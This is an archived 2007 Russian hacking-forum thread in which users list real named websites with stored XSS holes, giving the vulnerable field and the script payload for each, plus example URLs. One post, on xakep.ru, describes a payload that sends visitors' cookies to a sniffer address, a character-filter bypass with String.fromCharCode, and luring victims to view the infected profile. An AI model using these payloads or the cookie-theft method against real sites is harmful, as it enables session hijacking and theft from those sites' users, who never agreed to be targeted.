ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

07.06.2007, 11:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
Хэк в индексе=) поле Адрес сайта
http://hackyou.ru/
описание тут
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|

12.06.2007, 23:47
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме: 3025546
Репутация:
1327
|
|
www.web-hack.ru
www.web-hack.ru --> добавить новость
Вбиваем все данные на фонарь кроме кода, его вводим правильно. В саму новость(textarea) пишем:
Код:
<script>alert(document.cookie)</script>
и жмем кнопочку добавить (Аdd)
ps Как выяснилось, она является активной.
|
|
|

13.06.2007, 04:12
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме: 16641028
Репутация:
2371
|
|
www.wikiupload.com
Заливаем любой файл...в описание пишем
Код:
'"><script>alert(/xss/)</script>
Кнопочку "upload" жмем...
Выдается 2 ссылки, одна на скачку, другая на комментарии файла..
Идем в каменты и видим хсс
Пример
Код:
http://www.wikiupload.com/comment.php?id=158669
|
|
|

13.06.2007, 19:58
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
chatcity.ru
Ну вообщем то........вроде чаты на chatcity
Поля:
E-mail
web-страничка
Вот один пример на volchat.ru
Код:
http://volchat.ru/people/pp0.cgi?c=13397&cn=trane___
|
|
|

14.06.2007, 13:55
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме: 2943499
Репутация:
807
|
|
narod.yandex.ru
Пишем письмо в сообщество, уязвимо поле "Ваш сайт:"
<script>alert('123');</script>
Последний раз редактировалось freddi; 16.06.2007 в 23:29..
|
|
|

16.06.2007, 23:26
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме: 2943499
Репутация:
807
|
|
nm.ru
прикрепляем к письму файл txt или pdf со скриптом.
|
|
|

17.06.2007, 17:45
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме: 2943499
Репутация:
807
|
|
www.xyligan.ru
уязвимо поле "имя"))))
зы это из компании Хакера
ззы пассивных там полно.
|
|
|

17.06.2007, 21:34
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме: 2943499
Репутация:
807
|
|
www.xakep.ru
хсс в чате
уязвимо любое поле, но только одно, там нет ограничения на кол-во символов, но стоит фильтрация символов:
" ? +
это можно спокойно обойти через String.fromCharCode()
сам код идет в виде
"onmouseover="navigate('адрес_снифера' .concat(document.cookie))"
или просто
"onmouseover="alert('xss')"
кодируем
navigate('адрес_снифера'.concat(docume nt.cookie))
с помощью http://ha.ckers.org/xss.html
получится примерно
navigate ;
и пишем в виде
"onmouseover="String.fromCharCode(то что закодировали)"
ну чтоб все заработало там ставится галка "Допустить других к просмотру профайла" и говорим посмотрите мой профиль вот так)
зы спс DimOnOID за небольшую помощь)
Последний раз редактировалось freddi; 19.06.2007 в 20:57..
|
|
|

28.06.2007, 19:39
|
|
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме: 1062869
Репутация:
136
|
|
www.panvasoft.com
Весьма популярный,посещаемый сайт.
потставляем "><script>alert()</script> во все поля в коментариях.
Пример:http://panvasoft.com/rus/11970/gb/
www.hpclub.ru
Добавление комментарий
"><script>alert()</script>
Пример:http://www.hpclub.ru/news.php3?cID=4
www.consultclub.biz
Добавление комментарий
"><script>alert()</script>[/B]
Последний раз редактировалось V.I.P; 28.06.2007 в 20:19..
|
|
|

29.06.2007, 16:30
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме: 3372120
Репутация:
2565
|
|
www.lektravi.ru
Интернет магазин Лекарственные травы
Травки не желаете....=)
Активка в гостевой, при добавлении сообщения в поле почта пишем
Код:
'><script>alert("ShaDow");</script>
пример
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Xss
|
bx_N |
Forum for discussion of ANTICHAT |
7 |
11.03.2007 19:17 |
|
mylivepage.ru активные XSS
|
__XT__ |
Уязвимости |
3 |
23.12.2006 14:31 |
|
Xss для новичков
|
Micr0b |
Уязвимости |
0 |
04.06.2006 18:25 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|